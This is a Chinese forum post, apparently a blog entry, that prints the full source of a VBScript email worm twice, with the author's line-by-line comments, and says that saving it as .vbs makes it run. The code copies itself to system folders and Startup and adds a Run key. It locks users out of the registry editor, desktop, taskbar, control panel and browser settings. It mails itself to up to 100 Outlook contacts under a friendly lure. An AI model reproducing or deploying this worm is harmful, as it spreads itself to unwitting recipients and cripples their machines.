On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Start MenuPrograms启动Win32system.vbs")
//分别复制病毒到windows/winnt,system/system32,启动菜单下
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD" //禁止“运行”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD" //禁止“关闭系统”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives",63000000,"REG_DWORD" //隐藏盘符
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools",1,"REG_DWORD" //禁止使用注册表编辑器
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry","" //禁止注册表扫描
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD" //禁止“注销”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD" //禁止进入MS-DOS实模式
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","Win32system.vbs" // 运行这个病毒拉(开机自动运行)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD" //禁止显示桌面所有图标(就是桌面上什么都没拉,只看见蓝天^_^)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD" //这个大概是禁止进入MS-DOS模式拉
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskBar",1,"REG_DWORD" //禁止任务栏和开始菜单了
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD" //禁止鼠标右键
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD" //禁止控制面板
r.Regwrite "HKLMSoftwareCLASSES.reg","txtfile" //禁止使用REG文件
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","nihaoa " //这个就是开机提示的标题了
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","nihaoa aa a aa a " //开机提示的内容
Set ol=CreateObject("Outlook.Application") //这个是开始发信了(病毒要传播嘛)
On Error Resume Next
For x=1 To 100 //很明显,是给你的100个好友发信,这个值你可以自定义拉
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="还在忙吗?" //信的标题
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 来自Rose的问候!" //信的内容
Mail.Attachments.Add(dir2&"Win32system.vbs") //当他打开信后(当然是附件),这个就进驻他的磁盘了!!!害怕吧
Mail.Send
Next
ol.Quit
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD" //IE的右键被禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD" //Internet选项也禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD" // 想“另存为”,没门!!!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD" // 禁用“文件打开”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD" // 禁止更改高级设置
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD" // 临时文件设置也被禁止更改哦
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD" // “自动配置”禁止更改
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD" // 想更改你的主页,算了吧!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD" // “历史记录设置”也不能更改了
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD" // “Internet连接向导”
r.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.baidu.com" // 这是设置的默认首页
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD" // 禁止安全项,
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD" // 禁止“重置web设置”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD" // 查看源文件也不行,太毒了吧!~
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD" // 添加脱机页计划 禁用
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD" // 禁止资源管理器中文件菜单(想打开文件也^_^不行)
以上是病毒代码及分析,每行“//”后边的是我分析的,不知道对不对,欢迎大家指教。把上边的代码保存成.vbs格式的就可以运行了,其毒性很大,大家可要小心哦,,中毒了要及时杀掉,不然会传播的~~~
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Start MenuPrograms启动Win32system.vbs")
//分别复制病毒到windows/winnt,system/system32,启动菜单下
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD" //禁止“运行”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD" //禁止“关闭系统”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives",63000000,"REG_DWORD" //隐藏盘符
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools",1,"REG_DWORD" //禁止使用注册表编辑器
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry","" //禁止注册表扫描
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD" //禁止“注销”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD" //禁止进入MS-DOS实模式
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","Win32system.vbs" // 运行这个病毒拉(开机自动运行)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD" //禁止显示桌面所有图标(就是桌面上什么都没拉,只看见蓝天^_^)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD" //这个大概是禁止进入MS-DOS模式拉
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskBar",1,"REG_DWORD" //禁止任务栏和开始菜单了
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD" //禁止鼠标右键
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD" //禁止控制面板
r.Regwrite "HKLMSoftwareCLASSES.reg","txtfile" //禁止使用REG文件
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","nihaoa " //这个就是开机提示的标题了
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","nihaoa aa a aa a " //开机提示的内容
Set ol=CreateObject("Outlook.Application") //这个是开始发信了(病毒要传播嘛)
On Error Resume Next
For x=1 To 100 //很明显,是给你的100个好友发信,这个值你可以自定义拉
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="还在忙吗?" //信的标题
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 来自Rose的问候!" //信的内容
Mail.Attachments.Add(dir2&"Win32system.vbs") //当他打开信后(当然是附件),这个就进驻他的磁盘了!!!害怕吧
Mail.Send
Next
ol.Quit
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD" //IE的右键被禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD" //Internet选项也禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD" // 想“另存为”,没门!!!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD" // 禁用“文件打开”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD" // 禁止更改高级设置
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD" // 临时文件设置也被禁止更改哦
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD" // “自动配置”禁止更改
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD" // 想更改你的主页,算了吧!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD" // “历史记录设置”也不能更改了
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD" // “Internet连接向导”
r.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.baidu.com" // 这是设置的默认首页
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD" // 禁止安全项,
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD" // 禁止“重置web设置”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD" // 查看源文件也不行,太毒了吧!~
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD" // 添加脱机页计划 禁用
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD" // 禁止资源管理器中文件菜单(想打开文件也^_^不行)
以上是病毒代码及分析,每行“//”后边的是我分析的,不知道对不对,欢迎大家指教。把上边的代码保存成.vbs格式的就可以运行了,其毒性很大,大家可要小心哦,,中毒了要及时杀掉,不然会传播的~~~
5445
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
